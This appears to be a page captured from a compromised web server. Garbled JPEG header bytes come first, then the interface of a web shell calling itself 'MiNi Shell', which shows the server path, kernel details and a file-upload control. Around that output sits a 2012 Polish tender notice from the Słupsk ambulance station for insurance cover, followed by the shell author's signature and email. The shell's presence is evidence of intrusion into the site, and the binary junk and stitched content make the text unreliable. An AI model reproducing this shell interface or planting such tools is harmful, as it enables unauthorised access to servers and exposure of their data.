JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121116/455832-N-2012.html

<p class="kh_header"><b>Słupsk: Kompleksowe ubezpieczenie mienia, komunikacyjne, jednostki pływającej,  odpowiedzialności cywilnej pracowników  za mienie powierzone do naprawy oraz odpowiedzialności cywilnej świadczeniodawcy udzielającego świadczeń opieki zdrowotnej</b><br>
<b>Numer ogłoszenia: 455832 - 2012; data zamieszczenia: 16.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Stacja Pogotowia Ratunkowego , Ul. Paderewskiego 5, 76-200 Słupsk, woj. pomorskie, tel. 059 8414520, faks 059 8414520.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pogotowie.slupsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe ubezpieczenie mienia, komunikacyjne, jednostki pływającej,  odpowiedzialności cywilnej pracowników  za mienie powierzone do naprawy oraz odpowiedzialności cywilnej świadczeniodawcy udzielającego świadczeń opieki zdrowotnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowe ubezpieczenie na rok 2013 mienia, komunikacyjne, jednostki pływającej, odpowiedzialności cywilnej pracowników za mienie powierzone do naprawy, odpowiedzialności cywilnej świadczeniodawcy udzielającego świadczeń opieki zdrowotnej 
- zgodnie z wymogami określonymi w poniższym szczegółowym opisie przedmiotu zamówienia.

Ubezpieczenia komunikacyjne
1. Przedmiotem zamówienia jest ubezpieczenie OC, AC i NNW dot. taboru samochodowego SPR Słupsk, wyszczególnionego w załączonym wykazie (zał. nr 7) na okres  roczny od   1 stycznia  2013  r. do 31 grudnia 2013 r., z zastrzeżeniem, że pojazdy wyszczególnione w wykazie w pozycji 1 do 11   - na okres roczny od daty wskazanej w kolumnie 3.

Ubezpieczenie odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych OC
Zakres ubezpieczenia
Ubezpieczenie odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych zgodnie z ustawą z dnia 22.05.2003 r., (Dz. U. 2003, nr 124, poz. 1152, z późn. zm.)
Zakres terytorialny
Odpowiedzialność cywilna posiadaczy pojazdów mechanicznych za szkody powstałe w związku z ruchem tych pojazdów na terytorium RP oraz Unii Europejskiej.

Wykaz środków transportowych stanowi załącznik nr 7 do SIWZ. 
Ubezpieczenie AUTOCASCO (AC)
Przedmiotem ubezpieczenia są pojazdy wraz z wyposażeniem ujęte w wykazie stanowiącym załącznik nr 7 do SIWZ.
Zakres ubezpieczenia
Ochroną ubezpieczeniową objęte będą szkody polegające na uszkodzeniu, zniszczeniu lub utracie pojazdu, jego części lub wyposażenia wskutek zajścia wypadku ubezpieczeniowego w okresie ubezpieczenia. 
Zakres terytorialny
Ubezpieczeniem objęte będą szkody powstałe na terytorium RP i Unii Europejskiej. 
Suma ubezpieczenia
W przypadku pojazdów fabrycznie nowych - wartość pojazdu wynikająca z faktury pierwszego zakupu pojazdu od sprzedawcy (autoryzowanego przez importera lub producenta danej marki), obowiązująca w okresie 6 miesięcy od daty wystawienia faktury. 
W przypadku pojazdów używanych albo nowych obejmowanych ochroną ubezpieczeniową po upływie 6 miesięcy od daty wystawienia faktury pierwszego zakupu - obowiązująca w chwili ubezpieczenia wartość rynkowa pojazdu ustalana przez Zamawiającego na podstawie aktualnych notowań rynkowych cen pojazdu danej marki i typu z uwzględnieniem jego roku produkcji, okresu eksploatacji, wyposażenia, przebiegu i stanu technicznego. 
Udział własny - brak
Franszyza integralna 
500 zł brutto
Potrącenia amortyzacyjne
Koszty naprawy ustalane będą na podstawie części oryginalnych, serwisowych tj. części zamiennych produkowanych zgodnie ze specyfikacjami i standardami produkcyjnymi ustalonymi przez producenta danej marki, rekomendowanych przez producenta tego pojazdu i dystrybuowanych w autoryzowanych przez producenta pojazdu  punktach sprzedaży.

Ubezpieczenie następstw nieszczęśliwych wypadków NNW
Przedmiotem ubezpieczenia są następstwa wypadków samochodowych, które zaszły w związku z ruchem pojazdu lub podczas używania pojazdu, tj.:
a)	wsiadanie lub wysiadanie z  pojazdu,
b)	załadowywanie lub rozładowywanie pojazdu,
c)	zatrzymanie lub postój pojazdu,
d)	naprawa na miejscu,
e)	otwieranie lub zamykanie drzwi lub bramy garażu lub posesji (wyłącznie u kierowcy pojazdu),
f)	pobieranie paliwa (wyłącznie u kierowcy pojazdu).
Zakres terytorialny - RP i Unia Europejska 

2. Zapłata pełnej kwoty OC i NNW następować będzie do końca stycznia roku ubezpieczeniowego
3 Zapłata AC będzie dokonywana w 12-tu równych ratach miesięcznych.
4. Część oferty dotycząca ubezpieczenia taboru samochodowego powinna zawierać: 
1)	cenę (brutto) za ubezpieczenie odpowiedzialności cywilnej (OC)
2)	cenę (brutto) za ubezpieczenie auto-casco (AC)
3)	cenę (brutto) za ubezpieczenie od następstw nieszczęśliwych wypadków (NNW)
4)	 stawki OC dla poszczególnych pojazdów bądź grup pojazdów, które zastosowano do obliczenia ceny w p.pkt.1),
5)	stawki AC dla poszczególnych pojazdów bądź grup pojazdów, które zastosowano do obliczenia ceny w p.pkt.2), oraz inne uwarunkowania, które miały wpływ na wysokość tej ceny, takie jak np.  zwiększenie składki o (...), w związku z przekroczeniem progu wartości danego pojazdu,  
6)	stawkę NW od 1 osoby.  
    Stawki i ceny muszą dać się zbilansować.
5. Każdy nowo nabyty, użyczony, bądź w inny sposób pozyskany do użytku w ciągu roku
    pojazd:
    a) ubezpieczony będzie na żądany przez zamawiającego okres (z uwzględnieniem 
        przepisów o ubezpieczeniach obowiązkowych)
    b) ubezpieczony będzie w.g. przedstawionych w ofercie stawek rocznych, a należna   
       składka za ubezpieczenie, będzie proporcjonalna do okresu ubezpieczenia.
6. Wypłata odszkodowania będzie obejmować kwotę brutto z uwagi na to, że jednostka 
 świadczy usługi zwolnione z podatku VAT (sanitarki), i dokonywana będzie na podstawie zatwierdzonego kosztorysu - przy naprawach wykonywanych przez SPR, 
lub faktur obcych wykonawców - przy naprawach zleconych przez SPR.
7. W przypadku kosztorysowego rozliczenia szkody, podstawą do ustalenia odszkodowania będą cenniki (robocizna, części, materiały), obowiązujące w stacjach obsługi autoryzowanych przez producenta danej marki pojazdu.
8. Odszkodowanie nie będzie pomniejszone o udział własny.
9. Wysokość odszkodowania nie będzie ograniczona w przypadku naruszenia przez  kierującego przepisów Prawo o ruchu drogowym.

Ubezpieczenie jednostki pływającej
1.	Przedmiotem zamówienia jest ubezpieczenie ambulansu wodnego (morskiego), wraz z jego sprzętem i wyposażeniem medycznym od odpowiedzialności cywilnej (OC), następstw nieszczęśliwych wypadków (NNW) oraz casco, na okres 12 miesięczny  od 01 stycznia 2013 r. do 31 grudnia 2013 r.
2.	Szczegółowy opis przedmiotu ubezpieczenia zawiera załącznik nr 9. 
3.	Ambulans wodny przez okres 4 miesięcy (od 1 czerwca do 30 września 2012 r.), cumuje przy nabrzeżu portowym w Ustce, skąd wypływa do wezwań ratunkowych. Po godzinach pracy tj. od godz. 20:00 do 8:00 ambulans przebywa na terenie dozorowanym Stoczni Ustka
Obiekt jest ochraniany przez firmę Jantar ze Słupska.
Przez pozostałe 8 miesięcy łódź przebywa na terenie posesji Stacji w Słupsku, przy ul. Paderewskiego 5, w zamkniętym obiekcie.
Obiekt jest dozorowany.

Ubezpieczenie mienia
1. Przedmiotem zamówienia jest ubezpieczenie mienia SPR Słupsk wyszczególnionego w 
    załączonych wykazach (załączniki nr: 1; 1A; 1B; 2; 3; 4; 4A; 5) w wartości netto na I ryzyko:
a)	od ognia i innych zdarzeń losowych (wariant rozszerzony),
b)	od kradzieży z włamaniem i rabunku.
2. Za wartość ubezpieczonego mienia (budynków i urządzeń technicznych) - zał. 1A; 1B; 4; 5, przyjęto wartość początkową wynikającą z ewidencji księgowej, z wyjątkiem budynków administracyjnych i lokali mieszkalnych - zał. nr 4A, do których zastosowano wartość odtworzenia w cenie 3819,00 zł/m2. 
    Majątek obrotowy (zapasy w sklepach i magazynach) wyceniono wg cen zakupu.
3. Budynki i budowle traktować jako niepalne.
4. Zapłata następować będzie corocznie w dwóch ratach:
I.	rata - do 10 marca
II.	rata - do 10 lipca
5. Dodatkowe informacje:
    Obiekty położone są (zgodnie ze wskazaniem podanym w tabelach 4 i 4A), 
	w Słupsku, przy ul. Paderewskiego 5
	w Ustce, przy ul. Marynarki Polskiej 12c
	w Potęgowie, przy ul. Kościuszki 6
    Wszystkie obiekty są dozorowane,
Gotówka w kasach jest zabezpieczona zgodnie z wymogami Prezesa NBP.
Obiekty położone w Słupsku, wyposażone są w dwa systemy sygnalizacji i włamania
napadu zainstalowanego przez Zakład Instalacji Antywłamaniowej AZIA    -  autoryzacja 1473/P/94.


Ubezpieczenie odpowiedzialności cywilnej pracowników SPR za mienie powierzone do naprawy

- zg. z załącznikiem  nr 6.

Ubezpieczenie odpowiedzialności cywilnej świadczeniodawcy udzielającego świadczeń opieki zdrowotnej

1.	Przedmiotem zamówienia jest obowiązkowe ubezpieczenie odpowiedzialności cywilnej świadczeniodawcy udzielającego świadczeń opieki zdrowotnej - o którym mowa w rozp. Min. Finansów z dn. 22 grudnia 2011 r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej świadczeniodawcy udzielającego świadczeń opieki zdrowotnej (Dz. U. z 2011 r. Nr 293, poz. 1728.)
2.	Ubezpieczeniem objęta jest odpowiedzialność cywilna świadczeniodawcy (OC), udzielającego świadczeń opieki zdrowotnej, za szkody będące następstwem udzielania świadczeń zdrowotnych albo niezgodnego z prawem zaniechania udzielania świadczeń zdrowotnych. 
3.	Minimalna suma gwarancyjna ubezpieczenia odpowiedzialności cywilnej (OC), w okresie nie dłuższym niż 12 miesięcy wynosi równowartość w złotych: 
	75 000 euro w odniesieniu do jednego zdarzenia i 
	350 000 euro w odniesieniu do wszystkich zdarzeń, których skutki objęte są umową ubezpieczenia OC podmiotu leczniczego wykonującego działalność leczniczą.
Kwoty o których mowa wyżej ustalane są przy zastosowaniu średniego kursu euro ogłoszonego przez NBP po raz pierwszy w roku, w którym umowa ubezpieczenia OC została zawarta.  
4.	Wykaz ilościowy osób udzielających świadczeń zdrowotnych z podziałem na grupy zawodowe zawiera  zał. nr 8..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Ubezpieczenie komunikacyjne, którym objęte będą nowo zakupione  3 pojazdy: 2 ambualnse oraz pojazd do transporu dializowanych</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie wnosi się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	pełnomocnictwo do podpisania oferty, o ile prawo to nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonywania których pełnomocnik jest upoważniony. Pełnomocnictwa musi być złożone w oryginale,
2)	pełnomocnictwo do reprezentowania wszystkich wykonawców w przypadku wspólnego ubiegania się o zamówienie kilku wykonawców zgodnie z art. 23 ustawy Pzp.
Pełnomocnictwa musi być złożone w oryginale.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pogotowie.slupsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia (SIWZ), można odbierać w siedzibie Stacji Pogotowia Ratunkowego przy ul. Paderewskiego 5, 76-200 Słupsk w Sekcji Eksploatacji w godzinach od 8:00 do 14.00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2012 godzina 10:00, miejsce: Miejsce i termin składania ofert: siedziba Zamawiającego przy ul. Paderewskiego 5 w Słupsku, pok. nr 20 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com